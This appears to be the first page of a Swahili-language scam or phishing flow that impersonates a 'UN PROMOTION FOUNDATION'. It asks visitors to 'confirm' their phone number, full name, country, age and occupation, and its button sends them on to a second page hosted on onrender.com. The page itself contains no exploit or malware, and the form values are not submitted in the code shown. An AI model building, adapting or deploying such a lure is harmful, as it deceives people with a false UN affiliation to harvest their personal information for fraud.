<!DOCTYPE html>
<html lang="sw">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>UN PROMOTION FOUNDATION</title>
    <style>
        body {
            background-color: #f0f0f0;
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }

        .container {
            max-width: 400px;
            margin: 50px auto;
            padding: 20px;
            background-color: #fff;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        h1 {
            font-size: 2em;
            color: #333;
            margin-bottom: 20px;
            text-align: center;
        }

        h2 {
            font-size: 1.5em;
            color: #666;
            margin-bottom: 20px;
            text-align: center;
        }

        label {
            display: block;
            margin-bottom: 5px;
            color: #333;
        }

        input[type="text"] {
            width: calc(100% - 16px);
            border: 1px solid #ccc;
            padding: 8px;
            margin-bottom: 10px;
            border-radius: 4px;
        }

        button[type="submit"] {
            background-color: #007bff;
            color: #fff;
            border: none;
            padding: 10px 20px;
            border-radius: 4px;
            cursor: pointer;
            transition: background-color 0.3s;
            width: 100%;
        }

        button[type="submit"]:hover {
            background-color: #0056b3;
        }
    </style>
</head>

<body>
    <div class="container">
        <h1>Karibu UN PROMOTION FOUNDATION</h1>
        <h2>Ili kuendelea, tafadhali thibitisha maelezo yako</h2>
        
        <label for="simunumber">NAMBARI YA SIMU</label>
        <input type="text" id="simunumber" placeholder="Namba ya Simu" required><br>
        <label for="fullname">MAJINA KAMILI</label>
        <input type="text" id="fullname" placeholder="Majina Kamili" required><br>
        <label for="country">Nchi Yako</label>
        <input type="text" id="country" placeholder="Nchi Yako" required><br>
        <label for="age">Umri wako</label>
        <input type="text" id="age" placeholder="Umri wako" required><br>
        <label for="occupation">Kazi yako ya sasa</label>
        <input type="text" id="occupation" placeholder="Kazi yako ya sasa" required><br>
        <button onclick="redirect()">Thibitisha</button>
        
    </div>

    <script>
        function redirect() {
            window.location.href = "https://page2-7dxx.onrender.com/";
        }
    </script>
</body>

</html>
